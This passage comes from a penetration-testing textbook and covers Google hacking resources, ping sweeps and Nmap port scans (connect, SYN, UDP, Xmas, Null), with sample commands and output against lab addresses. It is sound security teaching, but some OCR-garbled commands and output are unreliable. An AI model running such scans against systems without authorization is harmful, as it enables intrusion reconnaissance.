3089technical phase, it has the potential for the best returns.
3090
3091WHERE DO I GO FROM HERE?
3092
3093Once you have practiced and mastered the basics of reconnaissance, you will
3094be armed with enough information and skill to tackle advanced topics in infor-
3095mation gathering. The following is a list of tools and techniques that will take
3096your information-gathering ability to the next level:
3097
3098â– Search Engine Directives for Sites Other Than Google:
3099
3100• Now that your Google-Fu is strong, you need to master this technique
3101using other search engines. Most modern search engines include direc-
3102tives or other ways to complete advanced searches. Remember you should
3103never rely on a single search engine to do all of your reconnaissance.
3104Searching for the same keywords in different search engines often returns
3105drastically different and surprisingly useful results.
3106
3107â– Search Engine Assessment Tool (SEAT)
3108
3109• SEAT is a great tool to use for quickly querying several different search
3110engines in a single pass. This tool automates much of the manual labor
3111required when performing reconnaissance across several different search
3112engines. SEAT is built into Backtrack and available from its creator at
3113www.midnightresearch.com. Their site even includes useful "how to"
3114videos for using SEAT.
3115
3116â– Johnny Long's Google Hacking Database (GHDB)
3117
3118• This is a single repository for some of the most effective and feared
3119Google Hacks in existence today! It has already been mentioned and
3120should go without saying but DO NOT RUN THESE QUERIES AGAINST
3121UNAUTHORIZED TARGETS! You can find the GHDB at http://www.
3122hackersforcharity.org/ghdb. While you are there, take a minute to read
3123about Hackers for Charity and Johnny's efforts with the "food for work"
3124program.
3125
3126â– Google Hacking for Penetration Testers, 2nd edition, Syngress
3127
3128• Johnny's Google Hacking book is a must-read for all penetration testers.
3129
3130â– Paterva's Maltego CE
3131
3132• Maltego is a very powerful tool that aggregates information from pub-
3133lic databases and provides shockingly accurate details about your tar-
3134get organization. These details can be technical in nature, such as the
3135
3136
3137
3138Reconnaissance CHAPTER 2
3139
3140
3141
3142location or IP address of your firewall, or they can be personal, such as
3143the physical location of your currently (travelling) salesman. Learning to
3144master Maltego takes a little effort but is well worth your time. A free
3145version is available in Backtrack.
3146
3147SUMMARY
3148
3149Information gathering is the first step in any penetration test or hack. Even
3150though this phase is less technical than most, its importance should not be
3151overlooked. The more information you are able to collect, the better your
3152chances of success in later phases of the penetration test. At first, the amount of
3153information that can be gathered on your target can seem a bit overwhelming,
3154but with a good documentation process, the proper use of tools, and further
3155practice you will soon master the art of reconnaissance.
3156
3157
3158
3159This page intentionally left blank
3160
3161
3162
3163
3164Information in This Chapter:
3165
3166â– Pings and Ping Sweeps
3167
3168â– Port Scanning
3169
3170â– Vulnerability Scanning
3171
3172
3173
3174INTRODUCTION
3175
3176Once step 1 has been completed, you should have a solid understanding of
3177our target and a detailed collection of gathered information. This data mainly
3178includes our collection of IP addresses. Recall that one of the final steps in
3179reconnaissance was to create a list of IP addresses that both belonged to the
3180target and that we were authorized to attack. This list is the key to transition-
3181ing from step 1 to step 2. In step 1, we mapped our gathered information to
3182
3183
3184
3185The Basics of Hacking and Penetration Testing
3186
3187
3188
3189attackable IP addresses. In step 2, we will map IP addresses to open ports and
3190services.
3191
3192It is important to understand that it is the job of most networks to allow at
3193least some communication to flow into and out of their borders. Networks
3194that exist in complete isolation with no Internet connection, no services like
3195e-mail or web traffic, are very rare today. Each service, connection, or potential
3196connection to another network provides a potential foothold for an attacker.
3197Scanning is the process of identifying live systems and the services that exist on
3198those systems.
3199
3200Step 2 begins by breaking the scanning process into three distinct phases:
3201
32022.1 Determining if a system is alive
3203
32042.2 Port scanning the system
3205
32062.3 Scanning the system for vulnerabilities
3207
3208Later in this chapter we will discuss tools that combine these phases into a sin-
3209gle process; however, for the purpose of introducing and learning new mate-
3210rial, it is best to cover them separately.
3211
3212Step 2.1 is the process of determining whether a target system is turned on and
3213capable of communicating or interacting with our machine. This step is the
3214least reliable and we should always continue with steps 2.2 and 2.3 regardless
3215of the outcome of this test. Regardless, it is still important to conduct this step
3216and make note of any machines that respond as alive.
3217
3218Step 2.2 is the process of identifying the specific ports and services running a
3219particular host.
3220
3221Simply defined, ports provide a way or location for software and networks to
3222communicate with hardware like a computer. A port is a data connection that
3223allows a computer to exchange information with other computers, software, or
3224devices. Prior to the interconnection of computers and networks, information
3225was passed between machines through the use of physical media like floppy
3226drives. Once computers were connected to a network, they needed an efficient
3227means for communicating with each other. Ports were the answer. The use of
3228multiple ports allows for simultaneous communication without the need
3229to wait.
3230
3231To further clarify this point for those of you who are unfamiliar with ports and
3232computers, it may be helpful to consider the following analogy: Think of your
3233computer as a house. There are many different ways that a person can enter the
3234house. Each of the different ways to enter your house (computer) is like a com-
3235puter port. Just like a port on a computer, all the entryways allow traffic to flow
3236into and out of your home.
3237
3238Imagine a house with unique numbers over each of the potential entry points.
3239Most people will use the front door. However, the owners may come in
3240through the garage door. Sometimes, people enter the house from a backdoor
3241
3242
3243
3244Scanning CHAPTER 3
3245
3246
3247
3248Table 3.1 Common Port Numbers and Their Corresponding Service
3249Port Number Service
3250
3251
3252
325320 FTP data transfer
3254
325521 FTP control
3256
325722 SSH
3258
325923 Telnet
3260
326125 SMTP (e-mail)
3262
326353 DNS
3264
326580 HTTP
3266
3267443 HTTPS
3268
3269
3270
3271or sliding glass door off the deck. An unconventional person may climb
3272through a window or attempt to squeeze through the doggie door!
3273
3274Regardless of how you get into your house, each of these examples corresponds
3275nicely with the analogy of computers and ports. Recall that ports are like gate-
3276ways to your computer. Some ports are more common and receive lots of traf-
3277fic (just like your front door); others are more obscure and rarely used (by
3278humans) like the doggie door.
3279
3280Many common network services run on standard port numbers and can give
3281attackers an indication as to the function of the target system. Table 3.1 pro-
3282vides a list of common ports and their corresponding services.
3283
3284Obviously there are many more ports and services. However, this list serves as
3285a basic introduction to common ports that are utilized by organizations today.
3286You will see these services repeatedly as you begin to port scan your targets.
3287
3288We need to pay special attention to the discovery of any open ports on our
3289target systems. You should make detailed notes and save the output of any tool
3290run in step 2.2. Remember every open port is a potential gateway into the tar-
3291get system.
3292
3293The final step in scanning is step 2.3, vulnerability scanning. Vulnerability
3294scanning is the process of locating and identifying known weaknesses in the
3295services and software running on a target machine. The discovery of known
3296vulnerabilities on a target system can be like finding the pot of gold at the end
3297of a rainbow. Many systems today can be exploited directly with little or no
3298skill when a machine is discovered to have a known vulnerability.
3299
3300It is important to mention that there is a difference in the severity of various
3301vulnerabilities. Some vulnerabilities may present little opportunities for an
3302attacker, whereas others will allow you to completely take over and control a
3303machine with a single click of a button. We will discuss the various levels of
3304vulnerabilities in more detail later in the chapter.
3305
3306In the past, I have had several clients ask me to attempt to gain access to some
3307sensitive server on an internal network. Obviously in these cases, the final
3308
3309
3310
3311The Basics of Hacking and Penetration Testing
3312
3313
3314
3315target is not directly accessible via the Internet. Whether we are going after
3316some supersecret internal machine or simply attempting to gain access to a
3317network, we usually begin by scanning the perimeter devices. The reason for
3318this is simple, we start at the perimeter because most of the information we
3319have from step 1 belongs to perimeter devices. Also, with many of today's tech-
3320nologies and architectures, it is not always possible to reach directly into a net-
3321work. As a result, we often employ a hacking methodology where we chain a
3322series of machines together in order to reach our final target. First we conquer a
3323perimeter device, then we move to an internal machine.
3324
3325Perimeter devices are computers, servers, routers, firewalls, or other equipment,
3326which sit at the outer edge of a protected network. These devices serve as an
3327intermediary between protected internal resources and external networks like
3328the Internet.
3329
3330As previously mentioned, we often begin by scanning the perimeter devices
3331to look for weaknesses or vulnerabilities that will allow us to gain entry into
3332the network. Once we have successfully gained access (which we will discuss
3333in Chapter 4), the scanning process can be repeated from the newly owned
3334machine, in order to find additional targets. This cyclical process allows us to
3335create a very detailed internal network map and discover the critical infrastruc-
3336ture hiding behind the corporate firewall.
3337
3338PINGS AND PING SWEEPS
3339
3340A ping is a special type of network packet called an ICMP packet. Pings work
3341by sending specific types of network traffic, called ICMP Echo Request pack-
3342ets, to a specific interface on a computer or network device. If the device (and
3343the attached network card) that received the ping packet is turned on and not
3344restricted from responding, the receiving machine will respond back to the
3345originating machine with an Echo Reply packet. Aside from telling us that
3346a host is alive and accepting traffic, pings provide other valuable information
3347including the total time it took for the packet to travel to the target and return.
3348Pings also report traffic loss that can be used to gauge the reliability of a net-
3349work connection. Figure 3.1 shows an example of the ping command.
3350
3351The first line in Figure 3.1 shows the ping command being issued. Please note,
3352this particular screenshot was taken from a Windows machine. All modern ver-
3353sions of Linux and Windows include the ping command. The major difference
3354between the Linux and Windows version is that by default the Windows ping
3355command will send four Echo Request packets and automatically terminate,
3356whereas the Linux ping command will continue to send Echo Request com-
3357mands until you force it to stop. On a Linux system, you can force a ping com-
3358mand to stop sending packets by using the CNTL+C combination.
3359
3360Let us focus our attention on the third line that starts with "Reply from." This
3361line is telling us that our ICMP Echo Request packet successfully reached the IP
3362address of 64.233.167.99 and that the IP address sent a Reply packet back to
3363
3364
3365
3366Scanning CHAPTER 3
3367
3368
3369
3370
3371
33723B Command Prompt
3373
3374
3375l = iill«^i.J
3376
3377
3378
3379
3380c:\>ping google. con
3381
3382
3383
3384
3385
3386
3387
3388
3389
3390
3391Pinging gaDgle.con [64.233.167.99] with 32 bytes of data:
3392
3393
3394
3395
3396
3397
3398
3399
3400
3401
3402Reply Fran 64.233.167.99: hytes-32 tine'26ns IIL=24B
3403Reply fron 64.233.167.99: bytes-32 tine -26ns TTL-24B
3404Reply from 64.233.167.99: bytes-32 tine -26ns TIL-248
3405Reply frora 64.233.167.99: bytes»32 tine=28ns 1IL=24B
3406
3407
3408
3409
3410
3411
3412
3413
3414
3415
3416Ping statistics for 64.233.167.99:
3417
3418Packets: Sent * 4, Received M 4, Lost - @ <0X loss>,
3419Approxinate round trip tines in nilli-seconds :
3420
3421Hininun - 26ns, Haxircun = 28ns, Average E 26ns
3422
3423
3424
3425
3426
3427
3428
3429
3430
3431
3432c:V>_
3433
3434
3435
3436
3437
3438
3439
3440
3441
3442FIGURE 3.1
3443
3444An Example of the Ping Command.
3445
3446
3447
3448our machine. The "bytes=32" in the line indicate the size of the packet being
3449sent. The "time=26ms" is telling you how long the entire round trip took for
3450the packets to travel to and from the target. The "TTL=240" is a Time To Live
3451value; this is used to determine the maximum number of hops the packet will
3452take before automatically expiring.
3453
3454Now that you have a basic understanding of how the ping command works, let
3455us see how we leverage this tool as a hacker. Because we know that pings can
3456be useful in determining if a host is alive, we can use the ping tool as a host
3457discovery service. Unfortunately, pinging every potential machine on even a
3458small network would be highly inefficient. Fortunately for us, there are several
3459tools that allow us to conduct ping sweeps. A ping sweep is a series of pings
3460that are automatically sent to a range of IP addresses, rather than manually
3461entering the individual target's address.
3462
3463The simplest way to run a ping sweep is with a tool called FPing. FPing is built
3464into Backtrack and is run from the terminal. The tool can also be downloaded
3465for Windows. The easiest way to run FPing is to open terminal window and
3466type the following: fp i ng -a -g 172,16.45.1 172.16.45.254yhosts.txt.
3467The "-a" switch is used to show only the live hosts in our output. This makes
3468our final report much cleaner and easier to read. The " -g" is used to specify
3469the range of IP addresses we want to sweep. You need to enter both the begin-
3470ning and the ending IP addresses. In this example, we scanned all the IPs from
3471172.16.45.1 to 172.16.45.254. The ">" character is used to pipe the output to
3472a file, and the hosts.txt is used to specify the name of the file our results will be
3473saved to. There are many other switches that can be used to change the func-
3474tionality of the FPing command. You can view them all by entering the follow-
3475ing command in a terminal window:
3476
3477man fping
3478
3479
3480
3481The Basics of Hacking and Penetration Testing
3482
3483
3484
3485Once you have run the command above, you can open the hosts.txt file that
3486was created to find a list of target machines that responded to our pings. These
3487IP addresses should be added to your target list for later investigation. It is
3488important to remember that not every host will respond to ping requests; some
3489hosts may be firewalled or otherwise blocking ping packets.
3490
3491PORT SCANNING
3492
3493Now that you have a list of targets, we can continue our examination by scan-
3494ning the ports on each of the IP addresses we found. Recall that the goal of port
3495scanning is to identify which ports are open and determine what services are
3496available on our target system. A service is a specific job or task that the com-
3497puter performs like e-mail, FTP, printing, or providing web pages. Port scanning
3498is like knocking on the various doors and windows of a house and seeing who
3499answers. For example if we find that port 80 is open, we can attempt a connec-
3500tion to the port and oftentimes get specific information about the web server
3501that is listening on that port.
3502
3503There are a total of 65,536 (0-65,535) ports on every computer. Ports can be
3504either TCP or UDP depending on the service utilizing the port or nature of the
3505communication occurring on the port. We scan computers to see what ports
3506are in use or open. This gives us a better picture of the purpose of the machine,
3507which, in turn, gives us a better idea about how to attack the box.
3508
3509If you had to choose only one tool to conduct port scanning, you would
3510undoubtedly choose Nmap. Nmap was written by Gordon "Fyodor" Lyon and
3511is available for free from www.insecure.org and is built into many of today's
3512Linux distributions including Backtrack. Although it is possible to run Nmap
3513from a graphical user interface (GUI), we are going to focus on using the termi-
3514nal to run our port scans.
3515
3516People who are new to security and hacking often ask why they should learn
3517to use the command line or terminal version of a tool rather than relying on a
3518GUI. These same people often complain that using the terminal is not as easy.
3519The response is very simple. First, using the command line version of a tool will
3520allow you to learn the switches and options that change the behavior of your
3521tool. This gives you more flexibility, more granular control, and a better under-
3522standing of the tool you are running. Second (and maybe more importantly),
3523rarely does hacking work like it is portrayed in the movies. Finally, the com-
3524mand line can be scripted. Scripting and automation become key when you
3525want to advance your skillset to the next level.
3526
3527Remember the movie Swordfish where Hugh Jackman is creating a virus? He is
3528dancing and drinking wine, and apparently building a virus in a very graphical,
3529GUI-driven way. The point is that this is just not realistic. Most people who are
3530new to hacking assume that hacking is a very GUI-oriented task: that once you
3531take over a machine you are presented with a desktop and control of the mouse
3532and screen. Although this scenario is possible, it is rarely the case. In most jobs,
3533
3534
3535
3536Scanning CHAPTER 3
3537
3538
3539
3540your main goal will be to get an administrative shell or backdoor access to the
3541machine. This shell is literally a terminal that allows you to control the target PC
3542from the command line. It looks and feels just like the terminals that we have
3543been working with, except a remote shell allows you to enter the commands
3544on your computer terminal and have them executed on the target machine. So
3545learning the command line version of your tools is critical because once you
3546have control of a machine you will need to upload your tools and interact with
3547the target through a command prompt, not through a GUI.
3548
3549Let us assume you still refuse to learn the command line. Let us also assume
3550that with the use of several tools you were able to gain access to a target system.
3551When you gain access to that system, you will not be presented with a GUI but
3552rather with a command prompt. If you do not know how to copy files, add
3553users, modify documents, and make other changes through the command line,
3554your work of owning the target will have been in vain. You will be stuck, like
3555Moses who was able to see the promised land but not allowed to enter!
3556
3557When we conduct a port scan, our tool will literally create a packet and send
3558it to each designated port on the machine. The goal is to determine what kind
3559of a response we get from the target port. Different types of port scans can pro-
3560duce different results. It is important to understand the type of scan you are
3561running as well as the expected output of that scan.
3562
3563The Three-Way Handshake
3564
3565When two machines on any given network want to communicate using TCP,
3566they do so by completing the three-way handshake. This process is very similar
3567to a phone conversation (at least before everyone had caller ID!). When you
3568want to talk to someone on the phone, you pick up the phone and dial the
3569number, the receiver picks up the ringing phone not knowing who the caller
3570is and says "Hello?," the original caller then introduces himself by saying "Hi,
3571this is John!" In response to this, the original receiver will often acknowledge
3572the caller by saying "Oh, hi John!" At this point both people have enough
3573information for the conversation to continue as normal.
3574
3575Computers work much the same way. When two computers want to talk, they
3576go through a similar process. The first computer connects to the second com-
3577puter by sending a SYN packet to a specified port number. If the second com-
3578puter is listening, it will respond with a SYN/ACK. When the first computer
3579receives the SYN/ACK, it replies with an ACK packet. At this point, the two
3580machines can communicate normally. In our phone example above, the origi-
3581nal dialer is like sending the SYN packet. The receiver picking up the phone
3582and saying "Hello?" is like the SYN/ACK packet and the original caller intro-
3583ducing himself is like the ACK packet.
3584
3585Using Nmap to Perform a TCP Connect Scan
3586
3587The first scan we will look at is called the TCP Connect scan. This scan is often
3588considered the most basic and stable of all the port scans because Nmap
3589
3590
3591
3592The Basics of Hacking and Penetration Testing
3593
3594
3595
3596attempts to complete the three-way handshake on each port specified in the
3597Nmap command. Because this scan actually completes the three-way hand-
3598shake and then tears down the connection gracefully, there is little chance that
3599you will flood the target system and cause it to crash.
3600
3601If you do not specify a specific port range Nmap will scan the 1,000 most com-
3602mon ports. Unless you are in a great hurry, it is always recommended specify-
3603ing all ports. The reason is that oftentimes crafty administrators will attempt
3604to obscure a service by running it on a nonstandard port. You can scan all the
3605ports by specifying " -p-" when running Nmap. Using the "-PN" switch with
3606every Nmap scan is recommended. Utilizing the "-PN" switch will cause Nmap
3607to disable host discovery and force the tool to scan every system as if it were
3608alive. This is extremely useful for discovering additional systems and ports that
3609otherwise may be missed.
3610
3611To run a TCP connect, we issue the following command from a terminal:
3612
3613nmap -sT -p- -PN 172.16.45.135
3614
3615Take a moment to review this command. The first word "nmap" causes the
3616Nmap port scanner to start. The second command " sT" tells Nmap to run
3617a TCP Connect scan. Specifically, to break this switch down even further, the
3618"-s" is used to tell Nmap what kind of scan we want to run. The "-T" in the
3619"-sT" is used to run a scan type of TCP Connect. We use the "-p-" to tell
3620Nmap to scan all the ports not just the default 1,000. We use the " PN" switch
3621to skip the host discovery phase and scan all the addresses as if the system were
3622alive and responding to ping requests. Finally, we specify the target IP address;
3623obviously your target's IP address will be different from the one shown in the
3624screenshot! Figure 3.2 shows the TCP Connect Nmap scan and the output that
3625was received when run against the target.
3626
3627Oftentimes, we need to run our scans against an entire subnet, or range of IP
3628addresses. When this is the case, we can instruct Nmap to scan a continuous
3629range of IPs by simply appending the last octet of the ending IP address onto
3630the scan like so:
3631
3632nmap -sT -p- -PN 172.16.45.1-254
3633
3634
3635
3636rootebt:~» nmap -sT -p- -PN 172 . 16.45 . 135
3637
3638Starting Nnap 5.30BETA1 ( http://nwap.org ) at 2010-16-94 14:30 CBT
3639
3640Hnap scan report for 172 . 16 . 45 . 135
3641
3642Host is up <0. 08019s latency).
3643
3644Hot shown : 65534 closed ports
3645
3646FORT STATE SERVICE
3647
36488B34/tcp opuii unknoun
3649
3650Hnap dene: 1 IP address (1 host up) scanned in 1.10 seconds
3651rnotiabt
3652
3653
3654
3655FIGURE 3.2
3656
3657TCP Connect Scan and Results.
3658
3659
3660
3661Scanning CHAPTER 3
3662
3663
3664
3665Issuing this command will cause Nmap to port scan all the hosts between the
3666IP addresses 172.16.45.1 and 172.16.45.254. Just like ping sweeps, this is a
3667very powerful technique that can greatly improve the productivity of your scan-
3668ning life!
3669
3670If you need to scan a series of hosts that are not in sequential order, you can
3671create a text file and list each host IP address on a single line. Then add the
3672"-i L path_to_the_text_fil e" switch to your Nmap command. Doing this
3673allows you to scan all of your target hosts from a single command. Whenever
3674possible, always try to create a single text file containing all of your target IPs.
3675Most of the tools we discuss have a switch or mechanism for loading this text
3676file, which saves the effort or retyping, but more importantly, reduces the num-
3677ber of times you will type each IP address and therefore reduces the chance
3678that you will fat-finger the IP address and scan the wrong target.
3679
3680Using Nmap to Perform a SYN Scan
3681
3682The SYN Scan is arguably the most popular Nmap port scan. There are many
3683reasons for its popularity, including the fact that it happens to be the default
3684Nmap scan. If you run the Nmap command without specifying a scan type
3685(using the -5 switch), Nmap will use the SYN scan by default.
3686
3687Aside from the fact that the SYN scan is the default choice, it is also popular
3688because it is faster than the TCP connect scan and yet remains quite safe, with
3689little chance of DOS'ing or crashing the target system. SYN scans are faster
3690because rather than completing the entire three-way handshake, it only com-
3691pletes the first two steps.
3692
3693In a SYN scan, the scanning machine sends a SYN packet to the target and the
3694target responds with a SYN/ACK (assuming the port is in use and not filtered)
3695just like it did when we ran a TCP Connect scan. However, at this point, rather
3696than sending the traditional ACK packet, the scanning machine sends an RST
3697(reset) packet to the target. The reset packet tells the target machine to disre-
3698gard any previous packets and close the connection between the two machines.
3699It should be clear that the speed advantage of the SYN scan over the TCP
3700Connect scan comes from the fact that there are less packets sent between the
3701hosts when using a SYN scan rather than a TCP Connect scan. Although a few
3702packets may not sound like a big advantage, it can add up quickly when scan-
3703ning multiple hosts.
3704
3705If we consider the example of comparing the three-way handshake to a phone
3706call, SYN scans would be like calling someone up, having the receiver pick up
3707the phone and saying "Hello?", and then simply hanging up on the person
3708without a single word.
3709
3710Another advantage to the SYN scan is that in some instances, it provides a level
3711of obscurity or stealth. Because of this feature, the SYN scan is often referred
3712to as the "Stealth Scan." The stealth portion of this scan comes from the fact
3713that because the three-way handshake is never fully completed, the official
3714
3715
3716
3717The Basics of Hacking and Penetration Testing
3718
3719
3720
3721connection was never 100 percent established. There are applications and log
3722files that require the completion of the three-way handshake before they begin
3723recording activity. As a result, if a log file only records completed connections
3724and the SYN scan never officially completes a single connection, this scan may
3725be undetected by some applications. Please note, this is the exception and not
3726the rule. All modern firewalls and intrusion detection systems in use today will
3727detect and report a SYN scan!
3728
3729Because the SYN scan is the default Nmap scan, we do not technically need
3730to specify the scan type with the "-s" switch. However, because this book
3731focuses on the basics, it is worth the effort to get into the habit of specifying
3732your scan type.
3733
3734To run a SYN scan, you can open a terminal window and issue the following
3735command:
3736
3737nmap -sS -p- -PN 172.16.45.135
3738
3739This command is exactly the same as the previous example with one excep-
3740tion — rather than using an "-sT" we used an "-sS." This instructs Nmap to run
3741a SYN scan rather than a TCP Connect scan. The scan types are easy to remem-
3742ber because a TCP Connect scan begins with the letter "T," whereas the SYN
3743scan begins with the letter "S." Each of the other switches was explained in the
3744section above. Please review the "Using Nmap to Complete a TCP Connect
3745Scan" for a detailed breakdown of the switches in this command. Figure 3.3
3746shows the output of a SYN scan against our target.
3747
3748Take a moment to compare the total run time between the two scans in Figures
37493.2 and 3.3. Even in our simple environment against a single host, the SYN
3750scan completed its execution faster.
3751
3752Using Nmap to Perform UDP Scans
3753
3754One of the most common port scanning mistakes of new penetration testers is
3755that they overlook UDP. These aspiring hackers oftentimes fire up Nmap, run a
3756single scan (typically a SYN scan), and move onto vulnerability scanning. Do
3757not neglect to scan UDP ports! Failing to scan your target for open UDP ports
3758
3759
3760
3761root»bt:"t map -sS -p- -PN 17Z . 16 .45 . 135
3762
3763Starting Nnap S.3QBETfll ( http :s/nn&p .org ) at 2010-10-04 14:59 CDI
3764
3765Nnap scan report for 172. lb .45 . 135
3766
3767Host Is up (0.0000060s latency).
3768
3769Not shoun: 65534 closed ports
3770
3771FORT STATE SERVICE
3772
3773BB34xtcp open unknoun
3774
3775Nnap done: 1 l¥ address (1 host up) scanned in 0.99 seconds
3776rootl»ht:~tl _
3777
3778
3779
3780FIGURE 3.3
3781
3782SYN Scan and Results.
3783
3784
3785
3786Scanning CHAPTER 3
3787
3788
3789
3790is like reading the Cliff Notes version of a book. You will probably have a solid
3791understanding of the story, but you arre likely to miss many of the details.
3792
3793It is important to understand that both TCP Connect scans and SYN scans use
3794TCP as the basis for their communication. TCP is an acronym for Transmission
3795Control Protocol. UDP is an acronym for User Datagram Protocol. Computers
3796can communicate with one another using either TCP or UDP; however, there
3797are several key differences between the two protocols.
3798
3799TCP is considered a "connection oriented protocol" because it requires that the
3800communication between both the sender and the receiver stays in sync. This
3801process ensures that the packets sent from one computer to another arrive at
3802the receiver intact and in the order they were sent. On the other hand, UDP
3803is said to be "connectionless" because the sender simply sends packets to the
3804receiver with no mechanism for ensuring that the packets arrive at the desti-
3805nation. There are many advantages and disadvantages to each of the protocols
3806including speed, reliability, and error checking. To truly master port scanning,
3807you will need to have a solid understanding of these protocols. Take some time
3808and learn about each of them.
3809
3810Recall that earlier the three-way handshake process was described by compar-
3811ing the process to a phone call. The three-way handshake is a key component
3812of TCP communication that allows the sender and the receiver to stay in sync.
3813Because UDP is connectionless, this type of communication is most often com-
3814pared to dropping a letter in a mailbox. In most cases, the sender simply writes
3815an address on an envelope, puts a stamp on the letter, and puts the letter in the
3816mailbox. Eventually, the mailman comes along and picks up the letter where
3817it is entered into the mail routing system. In this example, there is no return
3818receipt or delivery confirmation for the sender. Once the mailman takes the let-
3819ter, the sender has no guarantee that the letter will get to its final destination.
3820
3821Now that you have a very simple understanding of the difference between
3822TCP and UDP, it is important to remember that not every service utilizes TCP.
3823Several prominent services make use of UPD including DHCP, DNS (for indi-
3824vidual lookups), SNMP, and TFTP. One of the most important traits for a pen-
3825etration tester to have is thoroughness. It will be quite embarrassing to you if
3826you overlook or miss a service because you forgot to run a UDP scan against
3827your target.
3828
3829Both the TCP Connect scan and the SYN scan use TCP as the basis for their
3830scanning techniques. If we want to discover services utilizing UDP, we need to
3831instruct Nmap to create scans using UDP packets. Fortunately, Nmap makes
3832this process very simple. To run a UDP scan against our target, we would enter
3833the following command in a terminal:
3834
3835nmap -sU 172.16.45.129
3836
3837Notice the difference between this command and the others we have learned.
3838First, we specify the Nmap UDP scan by using the "-sU" command. Astute
3839readers will also notice that the "-p-" and the "-PN" switches have been
3840
3841
3842
3843The Basics of Hacking and Penetration Testing
3844
3845
3846
3847root@bt:~* nmap -sU 172.16.45.129
3848
3849Starting Nmap 5.39BETA1 ( http://nmap.0r9 ) a* 2619-19-86 13:49 COT
3850Nmap scan report for 172.16.45.129
3851Host is up (9.08857s latency).
3852Not shown: 998 closed ports
3853PORT STATE SERVICE
385468/udp open| filtered dhcpc
385569/udp oper>| filtered tftp
3856MAC Address: 99 : OC : 29 : AS : 88 : AD (VMware)
3857
3858Nmap done: 1 IP address tl host up) scanned in 1982.13 seconds
3859rootgbt :-# |
3860
3861
3862
3863
3864FIGURE 3.4
3865
3866UPD Scan Command and Result.
3867
3868
3869
3870dropped from the scan. The reason for this is simple. UDP scans are very slow;
3871running even a basic UDP scan on the default 1,000 ports can take 20-30 min-
3872utes. You may also notice that the IP address has changed. In this example, we
3873are scanning a Linux machine with the TFTP service running. This will allow us
3874to see the UPD scan with results. Figure 3.4 shows the output of the scan.
3875
3876It is important to remember that UDP communication does not require a
3877response from the receiver. If the target machine does not send back a reply
3878saying a packet was received, how can Nmap differentiate between an open
3879port and a filtered (firewalled) port? In other words, if a service is available
3880and accepting UDP packets, the normal behavior for this service is to simply
3881accept the packet but not send a message back to the receiver saying "GOT IT!"
3882Likewise, a common firewall strategy is to simply absorb the packet and not
3883send a response packet back to the sender. In this example, even though one
3884packet went through and one packet was blocked, because no packets were
3885returned to the sender, there is no way of knowing if the packet was accepted
3886by a service or dropped by the firewall.
3887
3888This conundrum makes it very difficult for Nmap to determine if a UDP port
3889is open or filtered. As a result when Nmap does not receive a response from a
3890UDP scan, it returns the following message for the port "open | filtered." It is
3891important to note that on rare occasions a UDP service will send a response
3892back to the original source. In these cases, Nmap is smart enough to under-
3893stand that there is clearly a service listening and responding to requests and
3894will mark those ports as "open."
3895
3896As was discussed earlier, oftentimes people who are new to port scanning over-
3897look UDP scans. This is probably due in part to the fact that most ordinary
3898UDP port scans provide very little information and mark nearly every port as
3899"open I filtered." After seeing the same output on several different hosts, it is
3900easy to become disillusioned with UDP scans. However, all is not lost! The fine
3901folks who wrote Nmap provide us with a way to draw more accurate results
3902from our UDP scans.
3903
3904
3905
3906Scanning CHAPTER 3
3907
3908
3909
3910To elicit a more useful response from our target, we can add the "-sV" switch
3911to our UDP scan. The "-sV" switch is used for version scanning but, in this
3912case, can also help us narrow the results of our UPD scan.
3913
3914When version scanning is enabled, Nmap sends additional probes to every
3915"open | filtered" port that is reported by the scan. These additional probes
3916attempt to identify services by sending specifically crafted packets. These spe-
3917cially crafted packets are often much more successful in provoking a response
3918from the target. Oftentimes, this will change the reported results from "open |
3919filtered" to "open."
3920
3921As mentioned above, the simplest way to add version scanning to a UDP probe
3922is to include the "-sV" switch. Please note that because we are already using
3923the "-sU" switch to specify the type of scan, we can simply append the capital
3924V onto the back of the "-sU." As a result, our new command becomes:
3925
3926nmap -sUV 172.16.45.135
3927
3928Using Nmap to Perform an Xmas Scan
3929
3930In the computer world, an RFC is a document that contains either notes or
3931the technical specifications covering a given technology or standard. RFCs can
3932provide us with a tremendous amount of detail about the inner workings of a
3933particular system. Because RFCs describe the technical details of how a system
3934should work, attackers and hackers will often review RFCs looking for potential
3935weaknesses or loopholes described in the documentation. Xmas Tree scans and
3936Null scans exploit just such a loophole.
3937
3938Xmas Tree scans get their name from the fact that the FIN, PSH, and URG
3939packet flags are set to "on"; as a result, the packet has so many flags turned on
3940and the packet is often described as being "lit up like a Christmas tree." Given
3941what we already know about TCP communications and the three-way hand-
3942shake, it should be clear that an Xmas Tree packet is highly unusual because nei-
3943ther the SYN nor ACK flags are set. However, this unusual packet has a purpose.
3944If the system we are scanning has followed the TCP RFC implementation, we
3945can send one of these unusual packets to determine the current state of the port.
3946
3947The TCP RFC says that if a closed port receives a packet that does not have a
3948SYN, ACK, or RST flag set (i.e., the type of packet that is created from an Xmas
3949Tree scan), the port should respond with an RST packet of its own. Furthermore,
3950the RFC states that if the port is open and it receives a packet without a SYN,
3951ACK, or RST flag set the packet should be ignored. Take a moment to reread the
3952last two sentences, as they are critical to understanding the response we get from
3953these scans.
3954
3955Assuming the operating system of the target fully complies with the TCP RFC,
3956Nmap is able to determine the port state without completing or even initiating
3957a connection on the target system. The word "assuming" was used because not
3958every operating system on the market today is fully RFC compliant. In general,
3959the Xmas Tree and Null scans work against Unix and Linux machines but not
3960
3961
3962
3963The Basics of Hacking and Penetration Testing
3964
3965
3966
3967root@bt:-# nmap -sX -p- -pn 172.16.45.129
3968
3969Starting Nmap S.36BETA1 ( http://nmap.org ) at 2616- 16-66 18:63 CDT
3970Nmap scan report for 172. 16. 4S. 129
3971Host is up (6.66359s latency).
3972Not shown: 65534 closed ports
3973PORT STATE SERVICE
3974
39758834/tcp open| filtered unknown
3976MAC Address: 00: OC : 29: A8:30: AD (VMware)
3977
3978Nmap done: 1 IP address (I host up) scanned in 7.33 seconds
3979root@bt:-# |
3980
3981
3982
3983FIGURE 3.5
3984
3985Xmas Tree Scan Command and Result.
3986
3987
3988
3989Windows. As a result, Xmas Tree and Null scans are rather ineffective against
3990Microsoft targets.
3991
3992To execute an Xmas Tree scan, we simply replace the "-sU" switch from our last
3993example with an "-sX." To run the full scan in the terminal, we would enter:
3994
3995nmap -sX -p- -PN 172.16.45.129
3996
3997Figure 3.5 shows the command and output of an Xmas Tree scan against a
3998Linux target.
3999
4000Using Nmap to Perform Null Scans
4001
4002Null scans, like Xmas Tree scans, are probes made with packets that violate tra-
4003ditional TCP communication. In many ways, the Null scan is the exact oppo-
4004site of a Xmas Tree scan because the Null scan utilizes packets that are devoid
4005of any flags (completely empty).
4006
